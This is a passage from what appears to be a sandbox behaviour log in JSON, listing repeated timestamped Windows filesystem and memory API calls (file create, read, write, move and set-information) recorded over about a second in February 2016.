"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,760", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,760", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,770", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,770", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,780", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,790", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,790", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,790", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,800", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,810", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,830", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,830", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,840", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,940", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,040", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 